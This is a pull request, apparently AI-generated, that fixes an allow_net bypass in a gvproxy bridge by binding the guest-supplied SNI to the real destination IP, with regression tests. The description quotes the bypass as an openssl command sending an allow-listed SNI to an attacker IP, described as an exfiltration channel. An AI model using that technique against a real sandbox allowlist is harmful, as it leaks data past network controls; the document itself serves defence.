### PR TITLE
fix(net): bind allow_net SNI inspection to the real destination IP

### DIFF
--- a/src/deps/libgvproxy-sys/gvproxy-bridge/forked_tcp.go
+++ b/src/deps/libgvproxy-sys/gvproxy-bridge/forked_tcp.go
@@ -118,7 +118,7 @@ func TCPWithFilter(s *stack.Stack, nat map[tcpip.Address]tcpip.Address,
 			standardForward(r, destAddr)
 			return
 		case tcpRouteInspect:
-			inspectAndForward(r, destAddr, destPort, filter, ca, secretMatcher)
+			inspectAndForward(r, destIP, destAddr, destPort, filter, ca, secretMatcher)
 			return
 		default:
 			// No matching rule: block
@@ -164,7 +164,7 @@ func standardForward(r *tcp.ForwarderRequest, destAddr string) {
 // inspectAndForward: Accept → Peek SNI/Host → check allowlist → Dial → relay.
 // The flow is reversed from upstream because we need to read from the guest
 // before deciding whether to connect to the upstream server.
-func inspectAndForward(r *tcp.ForwarderRequest, destAddr string, destPort uint16, filter *TCPFilter, ca *BoxCA, secretMatcher *SecretHostMatcher) {
+func inspectAndForward(r *tcp.ForwarderRequest, destIP net.IP, destAddr string, destPort uint16, filter *TCPFilter, ca *BoxCA, secretMatcher *SecretHostMatcher) {
 	// Step 1: Accept TCP from guest first (reversed from upstream)
 	var wq waiter.Queue
 	ep, tcpErr := r.CreateEndpoint(&wq)
@@ -200,12 +200,17 @@ func inspectAndForward(r *tcp.ForwarderRequest, destAddr string, destPort uint16
 		return
 	}
 
-	// Step 4: Check allowlist (skip if no allowlist — secrets-only mode allows all traffic)
-	if filter != nil && (hostname == "" || !filter.MatchesHostname(hostname)) {
+	// Step 4: Check allowlist (skip if no allowlist — secrets-only mode allows all
+	// traffic). The decision binds the guest-supplied SNI/Host to the real
+	// destination IP: a matching SNI is not sufficient if the connection is
+	// actually dialing an IP that is not a real address for that host. This blocks
+	// the bypass where a guest sends e.g. `--servername api.openai.com` while
+	// connecting to an attacker-controlled IP.
+	if filter != nil && !filter.AllowsConnection(hostname, destIP) {
 		logrus.WithFields(logrus.Fields{
 			"dst":      destAddr,
 			"hostname": hostname,
-		}).Info("allowNet TCP: blocked (hostname not in allowlist)")
+		}).Info("allowNet TCP: blocked (SNI/Host not allowed for destination IP)")
 		guestConn.Close()
 		return
 	}
@@ -213,7 +218,7 @@ func inspectAndForward(r *tcp.ForwarderRequest, destAddr string, destPort uint16
 	logrus.WithFields(logrus.Fields{
 		"dst":      destAddr,
 		"hostname": hostname,
-	}).Debug("allowNet TCP: allowed by hostname")
+	}).Debug("allowNet TCP: allowed (SNI bound to destination IP)")
 
 	// Step 5: Dial upstream
 	outbound, err := net.Dial("tcp", destAddr)

--- a/src/deps/libgvproxy-sys/gvproxy-bridge/main.go
+++ b/src/deps/libgvproxy-sys/gvproxy-bridge/main.go
@@ -239,6 +239,24 @@ func buildDNSZones(config GvproxyConfig) []types.Zone {
 	return dnsZones
 }
 
+// resolvedHostIPsFromZones extracts the concrete IPv4 A-record addresses that the
+// allow_net DNS sinkhole resolved for exact hostnames. These are exactly the IPs
+// the guest receives for allowed hosts, and are used to bind the TCP
+// SNI-inspection path to a real destination IP (see TCPFilter.AllowsConnection).
+func resolvedHostIPsFromZones(zones []types.Zone) []net.IP {
+	var ips []net.IP
+	for _, zone := range zones {
+		for _, record := range zone.Records {
+			ip4 := record.IP.To4()
+			if ip4 == nil || ip4.Equal(net.IPv4zero) {
+				continue
+			}
+			ips = append(ips, ip4)
+		}
+	}
+	return ips
+}
+
 func buildTapConfig(config GvproxyConfig, protocol types.Protocol) *types.Configuration {
 	nat := make(map[string]string)
 	gatewayVirtualIPs := []string{config.GatewayIP}
@@ -449,7 +467,12 @@ func gvproxy_create(configJSON *C.char, errOut **C.char) C.longlong {
 		if len(config.AllowNet) > 0 || instance.secretMatcher != nil {
 			var tcpFilter *TCPFilter
 			if len(config.AllowNet) > 0 {
-				tcpFilter = NewTCPFilter(config.AllowNet, config.GatewayIP, config.GuestIP, config.HostIP)
+				// Bind the SNI-inspection path to the exact IPs the allow_net DNS
+				// sinkhole resolved for allowed hosts — i.e. the addresses the guest
+				// itself receives — so a matching SNI to an attacker-controlled IP is
+				// rejected (audit finding #1).
+				tcpFilter = NewTCPFilter(config.AllowNet, config.GatewayIP, config.GuestIP, config.HostIP).
+					WithResolvedHostIPs(resolvedHostIPsFromZones(tapConfig.DNS))
 			}
 			if err := OverrideTCPHandler(vn, tapConfig, tapConfig.Ec2MetadataAccess, tcpFilter, instance.ca, instance.secretMatcher); err != nil {
 				logrus.WithError(err).Error("TCP: failed to override handler")

--- a/src/deps/libgvproxy-sys/gvproxy-bridge/resolved_zones_test.go
+++ b/src/deps/libgvproxy-sys/gvproxy-bridge/resolved_zones_test.go
@@ -1,0 +1,40 @@
+package main
+
+import (
+	"net"
+	"testing"
+
+	"github.com/containers/gvisor-tap-vsock/pkg/types"
+)
+
+// TestResolvedHostIPsFromZones verifies the glue that feeds the SNI↔IP binding:
+// it extracts the concrete A-record IPs the allow_net sinkhole resolved, while
+// ignoring wildcard regexp records and the 0.0.0.0 sinkhole default.
+func TestResolvedHostIPsFromZones(t *testing.T) {
+	zones := []types.Zone{
+		{
+			Name: "openai.com.",
+			Records: []types.Record{
+				{Name: "api", IP: net.ParseIP("203.0.113.10").To4()},
+				{Name: "api", IP: net.ParseIP("203.0.113.11").To4()},
+			},
+		},
+		{
+			Name:      "example.com.",
+			Records:   []types.Record{{IP: net.IPv4zero}}, // sinkhole default — must be ignored
+			DefaultIP: net.IPv4zero,
+		},
+		{Name: ""}, // catch-all sinkhole zone, no records
+	}
+
+	got := resolvedHostIPsFromZones(zones)
+	want := map[string]bool{"203.0.113.10": true, "203.0.113.11": true}
+	if len(got) != len(want) {
+		t.Fatalf("got %d IPs (%v), want %d", len(got), got, len(want))
+	}
+	for _, ip := range got {
+		if !want[ip.String()] {
+			t.Errorf("unexpected extracted IP %s (0.0.0.0 / wildcard records must be excluded)", ip)
+		}
+	}
+}

--- a/src/deps/libgvproxy-sys/gvproxy-bridge/tcp_filter.go
+++ b/src/deps/libgvproxy-sys/gvproxy-bridge/tcp_filter.go
@@ -22,6 +22,16 @@ type TCPFilter struct {
 	exactHosts       map[string]bool  // "api.openai.com" → true
 	wildcardSuffixes []string         // ".example.com"
 	hasHostnameRules bool
+
+	// resolvedHostIPs are the IPs the allow_net DNS sinkhole resolved for exact
+	// hostname rules — i.e. exactly the addresses the guest receives when it
+	// resolves an allowed host. Used only to bind the SNI-inspection path to a
+	// real destination IP (see AllowsConnection); kept separate from exactIPs so
+	// it does not widen which ports decideTCPRoute permits.
+	resolvedHostIPs map[[4]byte]bool
+	// resolve looks up a hostname's IPs at connection time, for wildcard
+	// subdomains that are not pre-resolved. Injectable for tests.
+	resolve func(string) ([]net.IP, error)
 }
 
 // NewTCPFilter parses allow_net rules into IP/CIDR and hostname categories.
@@ -32,9 +42,11 @@ func NewTCPFilter(rules []string, internalIPs ...string) *TCPFilter {
 	}
 
 	f := &TCPFilter{
-		exactIPs:    make(map[[4]byte]bool),
-		alwaysAllow: make(map[[4]byte]bool),
-		exactHosts:  make(map[string]bool),
+		exactIPs:        make(map[[4]byte]bool),
+		alwaysAllow:     make(map[[4]byte]bool),
+		exactHosts:      make(map[string]bool),
+		resolvedHostIPs: make(map[[4]byte]bool),
+		resolve:         defaultResolveHost,
 	}
 
 	// Internal IPs always allowed
@@ -143,6 +155,95 @@ func (f *TCPFilter) MatchesHostname(hostname string) bool {
 // HasHostnameRules returns true if any hostname/wildcard rules exist.
 func (f *TCPFilter) HasHostnameRules() bool {
 	return f.hasHostnameRules
+}
+
+// WithResolvedHostIPs records the IPs the DNS sinkhole resolved for exact
+// hostname rules so the SNI-inspection path can bind a connection's destination
+// IP to a real address for the claimed host. Returns the filter for chaining.
+func (f *TCPFilter) WithResolvedHostIPs(ips []net.IP) *TCPFilter {
+	if f == nil {
+		return f
+	}
+	for _, ip := range ips {
+		if ip4 := ip.To4(); ip4 != nil {
+			f.resolvedHostIPs[toIPv4Key(ip4)] = true
+		}
+	}
+	return f
+}
+
+// WithResolver overrides the connection-time hostname resolver (used for
+// wildcard subdomains). Returns the filter for chaining.
+func (f *TCPFilter) WithResolver(resolve func(string) ([]net.IP, error)) *TCPFilter {
+	if f != nil && resolve != nil {
+		f.resolve = resolve
+	}
+	return f
+}
+
+func defaultResolveHost(host string) ([]net.IP, error) {
+	return net.LookupIP(host)
+}
+
+// AllowsConnection decides whether a TLS/HTTP connection carrying the given
+// guest-supplied SNI/Host may proceed to destIP. It closes the allow_net bypass
+// where the SNI alone was trusted: the SNI must match a rule AND destIP must be
+// a real address for an allowed host. For exact hosts the destination must be
+// one of the sinkhole-resolved IPs (or an explicitly allow-listed IP); for
+// wildcard rules — whose subdomains are not pre-resolved — the host is resolved
+// at connection time and destIP must be in the result.
+func (f *TCPFilter) AllowsConnection(hostname string, destIP net.IP) bool {
+	if f == nil {
+		return true // no allowlist → no filtering
+	}
+	if !f.MatchesHostname(hostname) {
+		return false // SNI/Host not in the allowlist
+	}
+	if f.matchesIPOrResolvedHost(destIP) {
+		return true // destination is an explicitly allowed or sinkhole-resolved IP
+	}
+	// SNI matched but the IP was not pre-bound. Only legitimate for wildcard
+	// subdomains (not pre-resolved): bind by resolving the SNI now.
+	if f.hostnameMatchesWildcard(hostname) {
+		return f.resolvesTo(hostname, destIP)
+	}
+	return false
+}
+
+func (f *TCPFilter) matchesIPOrResolvedHost(destIP net.IP) bool {
+	if f.MatchesIP(destIP) {
+		return true
+	}
+	if ip4 := destIP.To4(); ip4 != nil {
+		return f.resolvedHostIPs[toIPv4Key(ip4)]
+	}
+	return false
+}
+
+func (f *TCPFilter) hostnameMatchesWildcard(hostname string) bool {
+	hostname = strings.ToLower(strings.TrimSuffix(hostname, "."))
+	for _, suffix := range f.wildcardSuffixes {
+		if strings.HasSuffix(hostname, suffix) {
+			return true
+		}
+	}
+	return false
+}
+
+func (f *TCPFilter) resolvesTo(hostname string, destIP net.IP) bool {
+	hostname = strings.ToLower(strings.TrimSuffix(hostname, "."))
+	ips, err := f.resolve(hostname)
+	if err != nil {
+		logrus.WithFields(logrus.Fields{"hostname": hostname, "error": err}).
+			Warn("allowNet TCP: connect-time resolution failed; blocking")
+		return false
+	}
+	for _, ip := range ips {
+		if ip.Equal(destIP) {
+			return true
+		}
+	}
+	return false
 }
 
 func toIPv4Key(ip net.IP) [4]byte {

--- a/src/deps/libgvproxy-sys/gvproxy-bridge/tcp_filter_test.go
+++ b/src/deps/libgvproxy-sys/gvproxy-bridge/tcp_filter_test.go
@@ -139,3 +139,42 @@ func assertFalse(t *testing.T, v bool, msg string) {
 		t.Errorf("expected false: %s", msg)
 	}
 }
+
+// TestTCPFilter_AllowsConnection_BindsSNItoIP is the audit #1 regression: a
+// guest-supplied SNI that matches the allowlist must NOT permit dialing an
+// arbitrary IP. The destination IP has to be a real address for the host —
+// either a sinkhole-resolved IP (exact host) or a connect-time-resolved IP
+// (wildcard subdomain).
+func TestTCPFilter_AllowsConnection_BindsSNItoIP(t *testing.T) {
+	f := NewTCPFilter([]string{"api.openai.com", "*.example.com"}, "192.168.127.1").
+		WithResolvedHostIPs([]net.IP{net.ParseIP("203.0.113.10")}). // sinkhole-resolved api.openai.com
+		WithResolver(func(h string) ([]net.IP, error) {
+			if h == "sub.example.com" {
+				return []net.IP{net.ParseIP("198.51.100.5")}, nil
+			}
+			return nil, nil
+		})
+
+	attacker := net.ParseIP("203.0.113.9")
+	realOpenAI := net.ParseIP("203.0.113.10")
+	realSub := net.ParseIP("198.51.100.5")
+
+	// exact host
+	assertTrue(t, f.AllowsConnection("api.openai.com", realOpenAI), "exact host to its resolved IP")
+	assertTrue(t, f.AllowsConnection("api.openai.com.", realOpenAI), "trailing-dot SNI normalized")
+	assertFalse(t, f.AllowsConnection("api.openai.com", attacker), "#1: allowed SNI to attacker IP must be blocked")
+
+	// wildcard host (subdomains not pre-resolved → connect-time bind)
+	assertTrue(t, f.AllowsConnection("sub.example.com", realSub), "wildcard host to live-resolved IP")
+	assertFalse(t, f.AllowsConnection("sub.example.com", attacker), "wildcard host to attacker IP must be blocked")
+
+	// SNI not in allowlist
+	assertFalse(t, f.AllowsConnection("evil.com", realOpenAI), "unlisted SNI blocked even toward an allowed IP")
+
+	// internal/gateway IP still allowed for an allowed SNI
+	assertTrue(t, f.AllowsConnection("api.openai.com", net.ParseIP("192.168.127.1")), "internal IP allowed")
+
+	// nil filter = no filtering
+	var nilFilter *TCPFilter
+	assertTrue(t, nilFilter.AllowsConnection("anything", attacker), "nil filter allows all")
+}


### PR DESCRIPTION
## Summary

Source-level security audit fix for the headline finding. The `allow_net` TCP
filter trusted the **guest-supplied SNI/Host alone**: `inspectAndForward` checked
`filter.MatchesHostname(SNI)` and then dialed the guest-chosen destination IP
without verifying the two belong together.

**Exploit:** with `allow_net=["api.openai.com"]`, a guest runs
`openssl s_client -connect 203.0.113.9:443 -servername api.openai.com` (or any
client sending an allow-listed SNI/Host to an attacker IP). The SNI matches, so
the proxy forwards the raw TLS stream to `203.0.113.9` — a data-exfiltration
channel to any host, defeating the allowlist. The DNS sinkhole doesn't help: the
attack hard-codes the IP and never resolves.

## Fix (bridge side — universal layer)

`TCPFilter.AllowsConnection(hostname, destIP)` binds the decision to the real
destination IP: the SNI must match a rule **and** `destIP` must be a real address
for an allowed host —
- **exact hosts:** `destIP` must be one of the IPs the allow_net DNS sinkhole
  already resolved (the exact addresses the guest itself received) — sourced from
  the DNS zone records, so there is no second, possibly-divergent resolution that
  could false-reject legitimate CDN traffic;
- **wildcard hosts** (subdomains aren't pre-resolved): the SNI is resolved at
  connection time and `destIP` must be in the result.

Resolved IPs are kept in a separate set so this does not widen which ports
`decideTCPRoute` permits.

This covers **every caller** (REST, local SDK, CLI). It is the bridge-side layer
of a defense-in-depth pair; the REST-side layer (resolve hostnames to /32 CIDRs
at box-create time) is #693. The two compose: for REST-created boxes the
allowlist arrives as IPs and the IP path handles it; this filter is the universal
backstop for everyone else.

## Test (two-sided)

`TestTCPFilter_AllowsConnection_BindsSNItoIP`: an allow-listed SNI toward an
attacker IP — and a wildcard SNI toward an attacker IP — are blocked, while the
sinkhole-resolved IP and the live-resolved wildcard subdomain IP pass. Reverting
`AllowsConnection` to the pre-fix SNI-only check makes both attacker cases pass
and the test fails. `TestResolvedHostIPsFromZones` covers the sinkhole→filter
glue (extracts real A-record IPs, ignores wildcard regexp records and the
0.0.0.0 sinkhole default). Full gvproxy-bridge suite + `go vet` green.

Audit finding #1 (high).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
